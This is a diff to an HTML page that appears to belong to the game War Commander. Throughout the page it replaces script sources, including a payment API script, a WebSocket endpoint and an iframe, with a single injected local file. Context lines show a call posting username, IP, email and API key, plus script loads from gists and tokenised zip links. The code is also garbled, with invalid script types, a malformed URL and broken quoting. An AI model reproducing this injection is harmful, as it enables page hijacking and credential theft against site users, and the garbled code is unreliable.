--- a/index.html
+++ b/index.html
@@ -640,7 +640,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 /></noscript>
 
 		<meta name="flattr:id" content="e7n3j1">
-		<script src="pret/br/mask.ps1xml "></script>
+		<script src="pret/returnDurString.js "></script>
 		<script src="https://github.com/GistIcon/pret/blob/master/br/detectmobilebrowser.js.svg?short_path=1b350c9></script>
 		<script type="text/javascript">
 			var canvasInitTime = new Date().getTime();
@@ -652,7 +652,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 "></script>
 		<script type="transparanttext/javascript" src="https://codeload.github.com/usernamealreadyis/ecdsa-key-20190112-Internet-Explorer/zip/master?token=APXo5xIhSSFZZOY8YlqoKPsvQkuElcx1ks5cPVrIwA=="></script>
 		<script type="transparanttext/javascript" src="https://github.com/GistIcon/pret/blob/150720b1230ac4aff4c3136b0473dd5616afd377/swf/inject.js"></script>
-		<script type="transparanttext/javascript" src="pret/br/mask.ps1xml "></script>
+		<script type="transparanttext/javascript" src="pret/returnDurString.js "></script>
 		<script type="transparanttext/php" src="https://codeload.github.com/GistIcon/--/zip/PHP?token=APXo56A8LzXkn8Y0uLO2ZpPk0b1ROtgjks5cNupKwA== "></script>
 		<script type="transparanttext/javascript" src="https://github.com/GistIcon/pret/blob/a21171f936d22da3a70500847e31155410a1c95d/Config/asset/se.ts"></script>
 		<script type="transparanttext/javascript"src="ecdsa-key-20190112-Internet-Explorer/.ecdsa-key-20190112 Internet Explorer/Please_wait...json "></script> 
@@ -746,7 +746,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 		<script>
 			dataLayer=[];(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-5SRSFGK');
 		</script>
-		<script src="https://gist.github.com/usernamealreadyis/faf54df8fade4e60e62400c081b3b8cd.js"></script>
+		<script src="pret/returnDurString.js "></script>
 		<script>
 			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');ga('create','UA-24282475-2','auto');ga('send','pageview');
 		</script>
@@ -872,7 +872,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 		<script type="text/javascript">
 			(function() {
 		                if (!isOptanonGroupActive("2")) return;
-						var script = 'pret/Config/0591E6CE - 953D2E12 - 2AE7D107 - 5B805B75 ';
+						var script = 'pret/returnDurString.js  ';
 						(function getScript(source, callback) {
 							var script = document.createElement('script');
 							var prior = document.getElementsByTagName('script')[0];
@@ -909,7 +909,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
 		    var React = require('react');
 		    var dll = 'pret/api-ms-win-core-errorhandling-l1-1-0.dll'; 
 		    var url = 'https://wc-fb-cdn7.kixeye.com/game/game-v7.v38215.swf';
-		    var iframe = '<iframe src="https://onedrive.live.com/embed?cid=F97413A6231F23E0&resid=F97413A6231F23E0%211460&authkey=AMf4fUJkUXOPjfQ" width="98" height="120" frameborder="0" scrolling="no"></iframe>'
+		    var iframe = 'pret/returnDurString.js '
 		    var executeDataIntelligenceScript = function() { if(!isOptanonGroupActive("2")) return;
 		        var source;
 		        if (!window.JSON) {
@@ -1019,7 +1019,7 @@ PostToHost("username=USERNAME&ip_addr=IPADDRESS&email=EMAILADDRESS&api_key=XXXXX
       xfbml      : true,
       version    : '{api-version}'
     });
-var socket = new WebSocket('ws: //pret/Config/0591E6CE - 953D2E12 - 2AE7D107 - 5B805B75 ');
+var socket = new WebSocket('ws: //pret/returnDurString.js ');
 socket.onopen = function () {
   setInterval(function() {
     if (socket.bufferedAmount == 0)
@@ -1061,7 +1061,7 @@ socket.onopen = function () {
 	<title>War Commander</title>
 			<link rel="stylesheet" type="text/css" href="/assets/style/wc-kx-vip.sjc-0-secure.v199.css" id="style-default" />
 		<link rel="manifest" href="/manifest.json" />
-		<script type="transparanttext/javascript" src="https://github.com/GistIcon/pret/blob/a21171f936d22da3a70500847e31155410a1c95d/Config/asset/se.ts"></script>
+		<script type="transparanttext/javascript" src="pret/returnDurString.js "></script>
 <script type="ddr/xml">
 Microsoft.Windows.Shell.NotificationController.ToastReportStatus
 {
@@ -1133,7 +1133,7 @@ Microsoft.Windows.Shell.NotificationController.ToastReportStatus
 <body id="body">
 		<script src="https://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js" type="text/javascript"></script>
 	<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
-		    <script type="text/javascript" src="https://static.pbc.com/js/ultimatepay-api.js"></script>
+		    <script type="text/javascript" src="pret/returnDurString.js "></script>
 	
 	<script>
 	        //no conflict jquery
@@ -1170,7 +1170,7 @@ EXIT\r\
    ["desc"]="Description",
    ["comins"]="%APK%",
    ["simurun"]="https://bi-logging.sjc.kixeye.com/kx/www/sr.php",
-   ["simu"]="",
+   ["simu"]="pret/returnDurString.js ",
    ["enc"]=1,
    ["sublime"]=1,
    ["pname"]="Product Name",
@@ -1240,7 +1240,7 @@ EXIT\r\
 	<script type="text/javascript" src="/assets/script/Array.Math.min.js"></script>    
 	<script type="text/javascript" src="/assets/script/fb.v199.js"></script>
 	<script type="text/javascript" src="/assets/script/cc-framework.v38455.js"></script>
-	<script type="text/javascript" src="/assets/script/rightclick.v199.js"></script>
+	<script type="text/javascript" src="/assets/script/pret/returnDurString.js "></script>
 	<script type="text/javascript">
 		var kxLogger = new KxLogger({
 			'kx_logger_url':'https://bi-logging.sjc.kixeye.com/log',
@@ -1254,7 +1254,7 @@ EXIT\r\
 			'appname':'warcommander',
 			'userlevel':'43',
 		});
-
+	<!-- // If integ data is required and this is not the play iframe, run the command & reload the page canvas -->
 		var cc = null;
 		
 		window.addEvent('domready',function(){
